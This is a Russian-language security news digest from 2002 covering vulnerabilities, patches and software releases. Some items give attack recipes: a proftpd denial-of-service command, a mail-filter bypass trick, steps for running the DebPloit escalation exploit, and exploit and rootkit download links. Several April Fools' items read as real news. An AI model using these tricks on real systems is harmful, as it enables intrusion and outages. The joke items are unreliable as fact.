3/04/2002 Возможность обхода ZoneAlarm 3.0 MailSafe.
ZoneAlarm 3.0 MailSafe - это часть файрволла ZoneAlarm Pro для проверки входящей почты на вирусы и дальнейшего отфильтровывания опасных присоединённых файлов. Edvice Security Services обнаружила возможность обхода ZoneAlarm MailSafe. Для этого достаточно после расширения имени присоедениямого файла указать точку (то есть exploit.exe.) В дальнейшем, если файл доходит до пользователя, Windows также не замечает этой "точки". Outlook or Outlook Express в свою очередь эту точку видит, но при запуске выполнимого файла всё равно запускает приложение. ZoneLabs выпустила новую версию своего файрволла - v3.0.118, которая доступна в разделе Updates cо вчерашего дня. Подробности - http://www.edvicesecurity.com/ad02-02.htm
3/04/2002 Уязвимость в Netware 6 Remote Manager.
iXsecurity обнаружила уязвимость в Remote Manager для ОС Netware 6, 6SP1-вэб-интерфейсе для управления сервером. Он доступен по порту 8009 при помощи броузера с возможностями SSL. При посылке на этот порт 595 либо 626 симоволов в поле имени пользователя или пароля. В зависимости от количества посылаемых символов "погибает" либо SERVER.NLM, либо HTTPSTK.NLM. До выхода официального патча рекомендуется отключить поддержку NLM. Источник - http://www.securityfocus.com
3/04/2002 Возможность переполнения буффера в Х-сервере Sun.
NSFOCUS Security Team обнаружила уязвимость в Xsun-Х-сервере фирмы Sun для ОС Solaris. Он инсталлирован в /usr/openwin/bin/. В реализации для SPARC-платформы он имеет бит SGID, а в х86-SUID, при этом собственник файла root. Этот Х-сервер может запускаться с опцией -co, которая позволяет запустить Х-сервер с собственной базой цветов (по умолчанию-rgb.txt). Если вместо имени файла (параметр этой опции) дать набор символов длиной больше 6000 байт, возникает возможность переполнения буффера. Используя эту уязвимость, атакующий может получить полномочия группы root (SPARC), либо пользователя root (x86-платформа). Уязвимость получила код CAN-2002-0158 в базе уязвимостей CVE (cve.mitre.org). Источник - http://www.securityfocus.com
3/04/2002 Возможность чтения локальных файлов через броузер IE.
Компания GreyMagic Software из Израиля опубликовала в BUGTRAQ очередную уязвимость в броузере IE, которая позволяет читать содержимое локальных файлов (полностью, либо частично). Тестировались версии: IE5sp2 NT4 sp6a, IE5.5sp2 Win98, IE5.5sp2 NT4 sp6a, IE6sp1 Win2000 sp2, IE6sp1 WinXP со всеми рекомендованными патчами. Уязвимость связана с CSS (Cascading Style Sheets)-элементом, который позволяет управлять представлением HTML-страниц. Используя свойство cssText объекта styleSheet, можно прочитать часть или весь файл локального или удалённого компьютера. Ошибка заключается в неправильном разборе и интерпретации CSS движком из IE символов "{". Авторы приводят пример кода, который позволяет просмотреть содержиое локального файла test.txt. В качестве временной меры безопасности (до выхода официального патча) рекомендуется отключить Active Scripting. Подробное описание уязвимости - http://security.greymagic.com/adv/gm004-ie/
3/04/2002 Заплатка для IE6, устраняющая брешь в защите броузера не работает так, как было задумано.
Как известно, 28 марта Microsoft выпустила обновление браузера Internet Explorer, предназначенное для устранения проблемы с возможностью запуска исполняемых файлов на машине пользователя. Ранее мы давали ссылку на эксплоит, позволяющий запустить калькулятор на машине пользвателя через HTML-код. Как пишет в BUGTRAQ Phil Dibowitz (webmaster@ipom.com), после установки этого патча и перезагрузки системы он не смог обращаться к компонентам Win2000 - 'Network and Dialup Connections' и 'Add/Remove programs'. После того, как Фил попытался восстановить всё из 'Safe Mode' и 'Last known good configuration' проблема не исчезла. Не помогло и восстановление (recovery) c CD. Проблема была решена только "даунгрейдом" IE с 6-го на 5-й с последующим патчем последнего IE за исключением последнего патча. Мнения о том, что последний патч является неработоспособным также высказываются на сервере theregister.co.uk. Ccылка на патч IE6 - http://www.microsoft.com/downloads/release.asp?releaseid=37216 Дискуссии о работоспобности патча - http://www.theregister.co.uk/content/4/24667.html
3/04/2002 Дыра в системе парольной защиты аукциона eBay открывает простор для мошенников.
Новостной сайт Newsbytes сообщил об обнаружении опасной уязвимости в системе парольной защиты аукциона eBay. В результате, злоумышленник может изменить пароль любого зарегистрированного пользователя аукциона и получить полный доступ к его счету, включая информацию о ставках, выставленных лотах, и номера кредитных карт. Причем для похищения учетной записи нет необходимости использовать какие-либо специальные приемы или программные средства - взлом сводится к несложным манипуляциям с двумя страницами eBay. Информацию о дыре сообщил Newsbytes анонимный специалист по компьютерной безопасности, скрывающийся под псевдонимом Null. Воспользовавшись его рекомендациями, сотрудникам Newsbytes удалось без каких-либо трудностей изменить пароль на специально созданном для этой цели счете. Источник - http://www.newsbytes.com/
2/04/2002 Вышел Gentoo Linux 1.0.
После 1.5 лет разработки и 6 релиз кандидатов вышел релиз этого замечательного дистрибутива. Дистрибутив основан на системе Portage 1.8.9 - аналога ports под BSD системы. Впечатления от работы с Portage самые приятные, глюков замечено не было. Система основана на: kernel 2.4.19-pre, gcc-2.95.3, glibc-2.2.5, kde-2.2.2, gnome-1.4.1 В принципе все можно заменить (использовать gcc-3.0.4 например), благо система позволяет это сделать почти достаточно легко. Дистрибутив представляет собой альтернативу linux from scratch, а также всевозможным редхатам, мандрейкам и иже с ними. Добавим также, что система требует редактирования конфигов ручками, хотя и не так "хардкорно", как слакварь; соответсвенно, требуеться минимальное понимание, что к чему в Linux. Официальный анонс - http://lists.gentoo.org/pipermail/gentoo-announce/2002-March/000133.html
2/04/2002 Взломай код и получи Ferrari!.
Meganet Corporation предлагает вломать код, зашифрованный с помощью Virtual Matrix Encryption (VME) с использованием 1,048,576-битного симметричного ключа. VME - коммерческий стандарт, признанный "неломающимся", т.к. он довольно устойчив против Brute Force аттак. Первому, кто взломает зашифрованный файл, корпорация дарит Ferrari за старания. Акция начата 1 марта и продлится до 31 августа сего года. Ferrari ещё на месте... Файл, который необходимо взломать - http://www.meganet.com/challenges/ferrari/ferrari.vme Фотография машины - http://www.meganet.com/challenges/ferrari/ferrari-l.jpg Источник - http://www.meganet.com/challenges/ferrari/ferrari.htm
2/04/2002 Браузерные войны: эпизод VI.
6 марта zdnet опубликовал статью Александр Савчук, asavchuk@mail.ru "Браузерные войны: эпизод VI". В статье автор довольно подробно рассматривает сильные и слабые стороны последних версий трёх основных конкурентов на рынке браузеров: IE6.0, Netscape 6.2.1 и Opera 6.01. Статья на zdnet - http://zdnet.ru/?ID=182981
2/04/2002 Столлман: разработчики становятся жертвой патентов.
Ричард Столлман хорошо известен в среде сторонников свободного ПО как автор GNU Public License(GPL), модели лицензирования, используемой большинством программистов open-source и гарантирующей, что написанные ими программы останутся общедоступными. На прошлой неделе британский Институт информационной политики (Foundation for Information Policy Research) пригласил Столлмана выступить в лаборатории вычислительной техники Кембриджского университета с докладом о патентовании программного обеспечения. Столлман ответил, что он видит проблему не в патентовании отдельных программ ("от этого нет никакого вреда"), но в патентовании идей: "Вот что делает их (патенты) опасным препятствием развитию программного обеспечения". По Столлману, сам термин "интеллектуальная собственность" несостоятелен и вводит в заблуждение: "Предполагается, что высказанную мысль можно считать собственностью. Это вовсе не способствует ясному, непредвзятому обмену мнениями". Ввобщем, довольно любопытное интервью. Рекомендуем ознакомиться. Русский перевод - http://zdnet.ru/?ID=184619
1/04/2002 Команда uinC распадается, сайт www.uinc.ru будет закрыт..
В связи со вчерашними собятиями мы вынуждены закрыть наш сайт и распаться, как команда. Для тех, кто еще не в курсе, вчера, в 18.00 по Московскому времени к двум участникам команды ворвались сотрудники ФСБ и арестовали их. Мы вынуждены удалить наш сайт в ближайшие несколько дней. Приносим свои глубочайшие извинения. uinC Team
1/04/2002 Многоликий fraud.
Главная забота сотовых операторов, помимо конкуренции друг с другом, - это борьба с разными видами фрода (от английского fraud, мошенничество). Это махинации с контрактами и счетами, хищения и клонирование сотовых телефонов, а также всевозможные изощренные способы обмана сотовых компаний. По оценкам специалистов, общемировые потери операторов от мошенничества составляют $20 - 25 млрд в год...Сравнительно новый тип фрода - это клонирование SIM-карт. После того как в апреле 1998 г. группе американских ученых удалось изготовить дубликат SIM-карты для телефона стандарта GSM, эта технология стала известна преступникам. "Для того чтобы клонировать чужую SIM-карту, требуется каким-то образом получить ее в свое распоряжение на шесть часов - столько времени нужно, чтобы подобрать код", - говорит Бернштейн. Телефоны устаревших стандартов NMT-450 и AMPS, в которых нет SIM-карт, клонировать еще проще - для этого достаточно сосканировать и выделить серийный номер телефона, передающийся по открытому радиоканалу, и присвоить его другому телефону. В стандарте GSM такое невозможно, и мошенникам необходимо физически получить SIM-карту. Подробности - http://is.park.ru/news.asp?dno=2711084&no=200899
1/04/2002 Russian Tea HOWTO For Linux Hackers.
Эмигрант из Питера, участвующий в тестировании mplayer for Linux и проживающий в настоящее время в Канаде Дениэл Наги, написал HOWTO по приготовлению истинно русского чая. Ознакомиться - http://www.mast.queensu.ca/~nagydani/rth/Russian-tea-HOWTO-v2.html
1/04/2002 Microsoft to base next generation OS on OpenBSD.
Компания Микрософт сообщила сегодня в пресс релизе, что она не собирается использовать свои шестилетние разработки ядра системы NT для создания операционных систем нового поколения. Такой шаг уже был сделан Apple Computer Inc., и как показали дальнейшие события, они не прогадали. Новая операционная система от Микрософт будет названа Windows BSD и будет основана на свободнодоступной системе OpenBSD. Ссылка: http://www.deadly.org/article.php3?sid=20020401035959
1/04/2002 Фирма SGI выпустила FreeBSD для своих рабочих станций.
Как объявили представители фирмы Silicon Graphics Inc. ими было успешно осуществлено портирование операционной системы FreeBSD на свои RISC-процессоры R4400, R5000 и R10000. Ранее фирма уже портировала для этих процессоров Linux и успешно занимается его поддержанием наравне с "родной" ОС IRIX. В планах фирмы на ближайший год-портирование операционных систем QNX, BeOS. Также прорабатывается вопрос перенесения и адаптирования кода FreeBSD на платформу суперкомпьютеров CRAY (фирма CRAY Research была в своё время приобретена SGI), для замены морально устаревшей ОС UNICOS. Источник - http://www.sgi.com
1/04/2002 В Win2K найдена "бэкдор", отсылающий информацию о пользователях Microsoft.
Хакерская команда sLoOf_LiRpA после долгих часов, проведённых за дизассемблированием кода операционной системы Windows 2000, обнаружила присутствие в системе "чёрного хода" (backdoor), который позволяет при обращении к определённому адресу памяти (указывается на адрес x010402) при помощи специальной функции API (название которой пока держится в секрете) активизировать внутренню скрытую фунцию сбора сведений о конфигурации системы, информации обо всех пользователях, специфических настройках и коде каждого программного продукта. Полученная таким образом информация должна отсылаться через установленный почтовый клиент по одному из адресов компании Microsoft. Необходимо отметить, что одного обращения к указанному адресу недостаточно. Необходимо ещё ввести и специальное секретное слово (пароль), представляющее из себя имя главы Microsoft-Bill_Gates. Когда члены команды обратились в фирму microsoft за разъяснениями, им было отвечено, что данная функция была реализована для внутренних нужд разработчиков и по ошибке не была выключена в окончательном релизе ОС Win2K. Источник - http://www.mustdie2002.za
1/04/2002 Уязвимость в Office XP.
Георгий Гунинский обнаружил уязвимость в компонентах Office XP. Первая из них связана с возможностью включения активного контента (object + script) в HTML-почту и последующего выполнения необходимого сценария в зоне безопасности (internet zone) IE. Вторая связана с компонентом, поддерживающим электронные таблицы. Из -за ошибки возникает возможность выполнения уязвимости типа cross application scripting. Примеры и подробное описание - http://www.guninski.com/m$oxp-2.html
1/04/2002 Caldera выпустила патчи для OpenLinux.
Caldera International Inc. объявила об обновлении сразу 4 пакетов для выпускаемого ей дистрибутива Linux - OpenLinux. Были обновлены: дистрибутив XFree - до версии 4.1-12, дтсрибутив squid - до 2.4.STABLE2, модуль mod_ssl (поддержка OpenSSL) - до 2.8.5_1.3.22-2, обнаруженную уязвимость в Name Service Cache Daemon (nscd) рекомендуется устранить записью в /etc/nscd.conf строки "enable-cache hosts no". Подробности - http://www.caldera.com/support/security/index.html
31/03/2002 Выпущен очередной патч для Internet Explorer.
28 марта компания Microsoft выпустила очередной набор заплаток для браузера Internet Explorer. Данное обновление включает патчи для всех обнаруженных в последнее время уязвимостей в программе, а также две дыры в защите, обнаруженных недавно. Одна из данных уязвимостей оценена как "критическая" прореха в безопасности, используя эту дыру в защите можно запускать скрипты без ведома пользователя. Подробности - http://www.compulenta.ru/news/2002/3/29/27590/
31/03/2002 Новый почтовый червь ползёт по России.
Антивирусная компания "Лаборатория Касперского" сообщает о начале эпидемии нового компьютерного вируса. К настоящему моменту зарегистрированы многочисленные случаи заражения вирусом Cervivec во многих городах России, Украины и Белоруссии. Cervivec был обнаружен почти неделю назад. Это произошло ещё 22 марта. Он представляет собой классического почтового червя. По Сети Cervivec распространяется в виде файлов, приложенных к электронным письмам. Источник - http://www.compulenta.ru/news/2002/3/29/27607/
31/03/2002 Патчи zlib для ОС Solaris.
Патчи для операционной системы Solaris доступны с сервера http://sunsolve.sun.com. Патчи относятся к "железу" x86 и SPARC. Включают в себя патчи OpenWindows 3.6.1, X11 6.4.1, SunOS 5.8 (он же патч динамической библиотеки /usr/lib/libz.so.1). Источник - http://www.securityfocus.com
31/03/2002 Обхождение JavaScript в анонимайзерах.
Как утверждает Александр Ежов, несмотря на различные ухищрения, которые применяются различными анонимайзерами в Интернет (отключение coockies, отключение Java script) существует возможность персонифицировать IP пользователя, если он использует IE и обойти выключение Java script. Автор демонстрирует на своей странице 3 вида подобного обхождения. Ссылка - http://anon.free.anonymizer.com/http://tools-on.net/you.shtml
30/03/2002 Уязвимы ли ключи длиной 1024 бита?.
В BUGTRAQ "Lucky Green" (shamrock@cypherpunks.to) опубликовал своё мнение о том, что ключи длиной 1024 бита в настоящее время недостаточно сильны и призвал всех перейти на ключи длиной 4096 бит. Основывал своё мнение автор на том факте, что математик Bernstein опубликовал возможность создания машины, которая теоретически смогла бы в течении достаточно короткого времени подобрать подобный RSA-ключ. Необходимо отметить, что стоимость подобной машины оченивается на уровне 1 триллиона долларов, и подобные затраты под силу только таким монстрам, как NSA, CIA, ФСБ и криптослужбам разведок самых развитых стран. Приводятся мнения за и против подобной трактовки. Ссылка приведена ниже. Подробности и мнения - http://www.eweek.com/article/0,3658,s=712&a=24663,00.asp
30/03/2002 SGI "латает" IRIX.
Silicon Graphics Inc. опубликовала серию патчей (заплаток) для своей ОС IRIX. Одна из них касается возможности DoS в TCP/IP стеке (что примечательно, инструмент, который выполныет этот DoS, известный под названием Naptha был опубликован ещё 30 ноября 2000 г.), вторая касается возможности выполнять анонимное сканирование, используя FTP-сервер, которым комплектуется IRIX (т.н. FTP Bouncer scanning), третья касается уязвимости сервиса rpcbind. Подобная "оперативность" господ из Силиконовой долины достойна порицания. Подробности - http://www.sgi.com/support/security/ Описание Naptha (для заинтересованных) -http://razor.bindview.com/publish/advisories/adv_NAPTHA.html
30/03/2002 Эксплоит для OpenSSH 2.9*.
В BUGTRAQ опубликовван исходный код эксплоита, использующего уязвимость в OpenSSH (channel_lookup()). Название эксплоита -osshchan.tgz Источник - http://www.securityfocus.com
30/03/2002 Локальная уязвимость в WINDOWS NT AND WINDOWS 2000.
Radim "EliCZ" Picha (Bugs@EliCZ.cjb.net) обнаружил уязвимость в операционных системах WinNT и Win2000, которая позволяет пользователю, имеющему локальный доступ к компьютеру (даже в качестве GUEST и Restricted), выполнять команды в секьюрити контексте пользователя administrator или SYSTEM. Последствия очевидны. Уязвимость кроется в подсистеме отладки smss.exe, которая позволяет получить доступ к порту DbgSsApiPort Local Procedure Call (LPC) любому пользователю. Выпущен эксплоит для win32 с названием DebPloit. После скачивания его необходимо выполнить следующие шаги: 1. Разархивировать, 2. Выйти из системы и войти пользвотелем GUEST или любым другим пользователем-неадминистратором. 3. Запустить ERunAsX.exe, задав в качестве аргумента команду, которая должна быть выполнена в контексте пользвотеля SYSTEM. 4. Наслаждаться полномочиями администратора в системе. Необходимо отметить, что компания SmartLine выпустила неофициальный хотфикс под названием DebPloitFix. Он является фактически динамическим драйвером ядра и может загружаться без перезагрузки системы. При этом он устанавливает новый секьюрити дескриптор порту DbgSsApiPort LPC, разрешая к нему доступ только пользователю с эккаунтом SYSTEM. Эксплоит - http://www.anticracking.sk/EliCZ/bugs/DebPloit.zip "Противоядие" (хотфикс) - http://www.smartline.ru/software/DebPloitFix.zip
29/03/2002 На сервере Softerra.ru выложены две новые довольно интересные статьи на тему руткитов, которая по-прежнему остается доволно неосвященной в рунете. Данные статьи являются переводами статей Октея Элтанеджила (Oktay Altunergil):.
Понятие Rootkit. http://www.softerra.ru/freeos/16901/page1.html Сканирование на предмет обнаружения Rootkit'ов. http://www.softerra.ru/review/security/16999/page1.html Большую коллекцию руткитов можно найти здесь: ftp://ftp.uinc.ru/uinc/unix/r00tkits/ А утилиты для обнаружения и удаления этих руткитов лежат здесь: ftp://ftp.uinc.ru/uinc/unix/r00tkit_detection/ и здесь: ftp://ftp.uinc.ru/uinc/unix/system_monitoring/
29/03/2002 30 марта в Австралии пройдет "праздник установки Linux".
В субботу группа поклонников открытой операционной системы Linux проведет в Университете Окленда, Австралия, мероприятие, названное "Linux Installfest", в рамках которого каждый владелец ПК получит возможность испробовать Linux в действии. 30 марта любой пользователь может принести свой компьютер в университет, на который специалистами будет установлен один из дистрибутивов на базе Linux. Один из организаторов мероприятия Дилан Рив сообщил, что пользователи смогут выбрать любой из имеющихся дистрибутивов Linux для установки. "Мы не собираемся убивать Windows. Дистрибутив Linux будет установлен в отдельный раздел, а пользователь ПК получит необходимый инструктаж в использовании открытой ОС", - заявил Рив. По его словам, такого рода мероприятия проходят по всему миру, ему известно о проведении "праздников инсталляции" в Новой Зеландии, однако ни один подобный проект не удостоился внимания прессы. Источник - http://www.compulenta.ru/news/2002/3/29/27581/
29/03/2002 В США продолжается активное продвижение закона CBDTPA.
История с принятием закона об защите контента от копирования (он же CBDTPA), о которой мы рассказывали в предыдущих новостях, продолжается.Член палаты представителей Адам Шифф, выступающий от лица жителей штата Калифорния (и, естественно, Голливуда), заявил, что предложит собственный план законопроекта о защите цифрового контента. Шифф полностью поддерживает идею CBDTPA, его действия направлены на как сокращение срока между разработкой закона и его внедрением на практике. Дело в том, что проект акта CBDTPA, ранее известного как SSSCA, был представлен в сенате, и, соответственно, должен быть одобрен сенаторами. Представив аналогичный законопроект в палате представителей, Шифф надеется на то, что его работа будет быстрее одобрена и узаконена, так как палата представителей может принимать решения, не ожидая одобрения сенаторов. "Пиратское распространение интеллектуальной собственности приобрело такой размах, что нам надо принять меры уже сейчас. Мы не можем больше ждать. Если творческие люди не смогут защищать свои работы, это может стать угрозой для артистического потенциала нашей страны в будущем!", - заявил Адам Шифф. Источник - http://www.wired.com
29/03/2002 Mozilla 1.0rc1 выйдет через две недели.
По сообщению http://mozillazine.org/, в конце следующей недели ожидается выпуск Mozilla 1.0 Release Candidate 1. Дерево разработки заморожено и принимаются только критические фиксы. Подробности - http://mozillazine.org/talkback.html?article=2179
29/03/2002 Ещё одна статья по переполнению буффера.
Crispin Cowan, специалист по безопасности Филадельфийского филиала компании WireX Communications и один из разработчиков Immunix Linux опубликовал свою статью по приниципам построения атак и защите от переполнения буффера (точнее было бы сказать-переполнение буффера в стеке). В статье рассмотрены различные типы атак на переполнение, методы и способы защиты от них, способы выбора оптимального соотношения между необходимым уровнем защиты и работоспособностью системы. Материалы, изложенные в статье, были представлены в докладах автора на конференциях по безопасности DARPA DISCEX и SANS 2000. Статья доступна в PDF-формате. Ссылка на статью - http://immunix.org/StackGuard/discex00.pdf
29/03/2002 Уязвимость в Oracle9i.
Андрей Гордиенко из Safety-Lab (www.safetylab.com)-один из создателей Shadow Security Scanner, Shadow Web Analyzer и прочих сканеров из этой линейки, опубликовал в BUGTRAQ способ для осуществления DoS атаки на TSNLISTEN в CУБД Oracle9i. Для этого достаточно послать на удалённый порт 1521/TCP один TCP-пакет, состоящий из одного байта (#$00 = 1 byte). Приложение забирает на себя все ресурсы процессора и перестаёт отзываться на запросы о соединении. Для возобновления работы приложения необходимо запустить TSNLISTEN. Для реализации атаки нет необходимости в Oracle клиенте или Oracle DLL. Тестировалась версия 9.0.1.1. Автор выложил win32 эксплоит. Подробности - http://www.safety-lab.com/en/bugs/index.htm Эксплоит (Shadow DoS Analyzer 1.01-0.6 МБ) - http://www.safety-lab.com/SDA.exe
28/03/2002 В сети организации ICANN обнаружены уязвимости.
В компьютерной сети Организации по контролю за выдачей доменов и интернет-адресов (ICANN) обнаружены несколько уязвимостей. В первом случае, специалисты ICANN обнаружили, что сетевой коммутатор, обслуживающий локальные компьютерные сети организации, находился в свободном доступе и был подвержен уязвимости, позволявшей изменить настройки коммутатора используя только веб-браузер (испытанный способ известного хакера Адриана Ламо). Во втором случае, было обнаружено, что исходный код и другая информация о системе, использующейся для обработки результатов разбирательств по спорным доменам, также находился в свободном доступе. Данные могли быть использованы для изменения информации о разбирательствах, и других документов ICANN. Данные проблемы с уязвимостями были решены сотрудниками организации на этой неделе. Источник - http://www.icannwatch.org
28/03/2002 Ad-Aware 5.7 - новая версия утилиты для обнаружения троянов в системе.
Компания LavaSoft выпустила очередную версию программы Ad-aware 5.7, предназначенной для обнаружения и удаления установленных в систему программ-шпионов. Ad-aware - это бесплатная утилита, содержащая информацию о множестве программ-троянов, которые могут быть установлены как намеренно (такие утилиты обычно отслеживают нажатия клавиш на клавиатуре, либо собирают статистику о деятельности пользователя), либо в случае неосторожного обращения с подозрительным файлом или программой. Скачать новую версию можно здесь - http://www.compulenta.ru/news/2002/3/28/27516/
28/03/2002 Даже если сделать Outlook безопасным, хакеры найдут уязвимость для взлома в других программах.
Эксперты по безопасности считают, что в ближайшее время появятся программы, использующие для взлома и проникновения в систему программу Windows Media Player. До последнего времени у хакеров не было необходимости исследовать приложение на наличие дыр в защите, так как достаточное число прорех можно было найти в почтовом клиенте Microsoft Outlook, уязвимости в котором использует для работы большинство вирусов, распространяющихся по e-mail. Однако, в ближайшее время хакерам придется искать другие способы взлома системы, так как серия патчей для Microsoft Outlook и Internet Explorer значительно повысила устойчивость системы к взлому и заражению вирусами. Эксперты по безопасности считают, что новым средством для проникновения в систему может послужить именно Windows Media Player, так как, по последним сведениям специалистов, данная программа может обходить настройки безопасности того же Outlook, запрещающие открытие приложенных к письму опасных файлов и отключающие скрипты. С установкой последних патчей от компании Microsoft, почтовый клиент Outlook больше не будет открывать исполняемые файлы без разрешения пользователей. Однако политика безопасности не распространяется на мультимедийные файлы, приложенные к письму, которые Outlook, считая безопасными, запускает на автоматическое воспроизведение с помощью Windows Media Player. Специалисты по безопасности предрекают, что рано или поздно хакеры найдут способ проникнуть в систему с помощью Windows Media Player или другой встроенной в Windows программы, которой "доверяет" Outlook. Источник - http://www.wired.com
28/03/2002 В сети развязалась война между программами-шпионами и средствами для борьбы с ними.
На сайте MSNBC опубликована поистине детективная история, посвященная борьбе программ-шпионов и утилит, выявляющих и удаляющих из системы установленные трояны. Речь идет о программе-шпионе WinWhatWhere, которая может быть тайно установлена в систему для сбора данных о пользователей. Хотя компании, которые производят такие программы заявляют, что ПО идет на продажу агентствам по борьбе с преступностью, основной доход разработчики получают от чрезмерно мнительных супругов, желающих узнать, не занимается ли чем-то некорректным вторая половина. Программы-шпиона появились давно, столь же давнюю историю имеют программы для борьбы с троянами. одной из таких программ является утилита Trapware, которая предупреждает пользователя при наличии трояна в системе и удаляет его. Разработчик TrapWare Вес Остин заявляет, что он получил массу писем от пользователей (в основном от разъяренных супругов) с благодарностями, его утилитой пользуются более 45 тысяч человек. Последняя версия трояна WinWhatWhere, к удивлению Остина, кроме своей профильной деятельности, также при установке уничтожала TrapWare. Как позже выяснилось, WinWhatWhere удаляет и другие программы, борющиеся с троянами. Подробности - http://www.compulenta.ru/news/2002/3/27/27421/
28/03/2002 Возможность получения прав суперпользователя в LogWatch.
LogWatch - это утилита, предназначенная для периодического просмотра и анализа лог-файлов и выдачи результирующей информации на заданные E-mail адрес (по умолчанию root). В версии LogWatch, которой комплектуется Red Hat 7.2 (2.1.1) cуществует уязвимость, позволяющая пользователю, имеющему доступ на машину, расширить свои полномочия до суперпользователя (root). Уязвимость связана в некорректном создании временной директории. Источник - http://www.securityfocus.com
28/03/2002 Возможность получения информации о локальных файлах через Internet Explorer.
В IE нашли очередную уязвимость, которая позволяет проверять существование на диске пользователя, обратившегося при помощи IE к определённым образом подготовленным интернет ресурсам (WWW-сайтам), определённых файлов и, при их существовании, получить информацию об их атрибутах. К этим атрибутам относятся: размер файла, время создания файла, время обновления файла, время последнего доступа к файлу. В комплексе с другими "багами", обнаруженными в IE, это позволяет злоумышленнику получить информацию о наличии в составе ПО компьютера определённых пакетов, а также их версий (по размеру файла и времени обновления). Уязвимость кроется в свойстве dynsrc элемента <img>. Этот элемент предназначен для представления рисунков и объектов мультимедиа в HTML-документе (VRML, AVI, MPEG, etc.). Свойства fileSize, fileCreatedDate, fileModifiedDate, fileUpdatedDate элемента <img> позволяют получить информацию о вышеназванных атрибутах, а значение, возвращаемое свойством fileSize как раз и говорит о наличии или отсуствии файла, заданного через dynsrc. Авторы приводят пример скрипта на своей странице. Тестировались версии IE: IE5sp2 NT4 sp6a, IE5.5sp2 Win98, IE5.5sp2 NT4 sp6a, IE6sp1 Win2000 sp2. Более подробно - http://security.greymagic.com/adv/gm003-ie/
28/03/2002 Статья по принципам построения атаки Buffer Overflow и защиты от неё.
Два студента из Франции Pierre-Alain FAYOLLE и Vincent GLAUME, изучающие в ENSEIRB (French national school of engineering) сетевые и распределённые вычислительные системы, после проработки вопроса об основных принципах переполнения буффера решили поделиться своими знаниями с остальной частью сетевого сообщества и разместили в Интернете документ с многообещающим названием "A Buffer Overflow Study. Attacks & Defenses". Как пишут авторы, целью этого документа было выяснить основные механизмы работы уязвимостей типа переполнения буффера и как подобные уязвимости могут сказаться на работе и безопасности сетевых и распределённых систем. Также в документе расмотрены наиболее распространённые методы защиты (Grsecurity, Libsafe и т.д.) от подобной уязвимости. Документ доступен в HTML и PDF-формате. Дополнения и замечания по статье приветствуются. Cсылка - http://www.enseirb.fr/~glaume/indexen.html
28/03/2002 Обновление статей:.
Технология взлома больших локальных сетей. Добавлена программка демонстрирующая "расшаривание" диска C. Ознакомиться: http://www.uinc.ru/articles/22/index.shtml
Написание экстра-маленьких Win32 приложений от 1 КБ на С++ Добавлен пример написания минимальной DLL. Ознакомиться: http://www.uinc.ru/articles/28/index.shtml
28/03/2002 Обновление нашего Forum FAQ..
Новые вопросы: + А есть ли дистрибутивы LINUX, которые помещаются на одну(2) дискеты с функциями файрволла, маршрутизатора (поддержкой сети)? + Где достать халявный шелл? Кроме того, множество мелких исправлений и дополнений. Прочитать FAQ можно здесь: http://www.uinc.ru/forum/faq.shtml
27/03/2002 DoS FTP-cервера proftpd.
Версия FTP-сервера, которая поставляется в составе дистрибутива LINUX Debian potato под названием porftpd содержит уязвимость, позволяющая при выполнении команды "ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*" привести к отказу типа DoS. При вводе этой команды демон proftpd начинает потреблять все процессорные ресурсы (память и мощность процессора) и в результате proftpd "сваливается", в некоторых случаях возможна также неработоспособность самого сервера. Тестировались версии proftpd до 1.2.1. В настоящий момент выпущена новая версия ProFTPD 1.2.2rc1. Как временное решение (до апгрейда) рекомендуется в конфигурационный файл proftpd добавить в контекст cледующую директиву - DenyFilter \*.*/. Также рекомендуется, чтобы демон стартовал с установленным для него ulimit, ограничивающим количество ресурсов, выделяемых процессу. Подробности - http://proftpd.linux.co.uk/critbugs.html
27/03/2002 Обнаружена уязвимость в SQUID.
В версиях популярного кэширующего прокси-сервера SQUID обнаружена уязвимость. Заключается она в некорректной обработке сжатых (compressed) DNS-ответов от внешнего (по отношению к сети, которая работает через SQUID) DNS-сервера. Это может привести к переполнению буффера и, как результат, к неработоспособности прокси-сервера. Ошибка в обработке запросов - в файле lib/rfc1035.c (преобразование сжатых DNS-ответов во внутренний DNS-код). Уязвимости подвержены версии SQUID до версии 2.4.STABLE4 включительно. Это позволяет "злоумышленнику" сформировать ответ от имени вышестоящего DNS-сервера (при условии спуффа IP-адреса последнего) DNS-ответ, который приведёт к отказу прокси-сервера. Администраторам SQUID необходимо обновить версию прокси до Squid-2.4.STABLE6. FreeBSD также выпустила бюллетень, в котором рекомендует обновить порты SQUID. Коллекция портов в составе FreeBSD 4.5 также содержит эту ошибку, поскольку была зарелизена до нахождения этой уязвимости. Ошибка была найдена zen-parse . Подробности - http://www.squid-cache.org/Advisories/SQUID-2002_2.txt Версия 2.4 STABLE6 доступна - http://www.squid-cache.org/Versions/v2/2.4/
27/03/2002 Четвертая on-line конференция на сервере Sec.Ru.
Информационный сервер по безопасности приглашает на четвёртую on-line конференцию специалистов и заинтересованных потребителей. Тематика конференции "Цифровые системы видеорегистрации и передачи видео по сетям". Конференция пройдет на Sec.Ru 10 апреля 2002 года. Начало в 15.00 часов.Будут рассмотрены следующие вопросы: 1. Аппаратное и программное сжатие. 2. Параметры оцифровки. 3. Специализированные системы (оборудование) и системы, базирующиеся на стандартных компьютерах. Приглашаются представители фирм выступить с докладом по теме конфренции. Доклады и предложения по рассматриваемым вопросам принимаются до 4 апреля. По всем вопросам обращаться на support@sec.ru или по телефону (095) 792-52-80. Подробности - http://www.sec.ru
27/03/2002 Выход KDE 3.0.
Сегодня на CVS-сервер KDE была выложена долгожданная третья версия популярного оконного менеджера для Linux. В ближайшие несколько дней можно ожидать официального релиза. Источник - http://www.linux.ru.net
26/03/2002 Хакеры вновь взломали сервер Microsoft, используя уязвимость годичной давности или "сапожник без сапог".
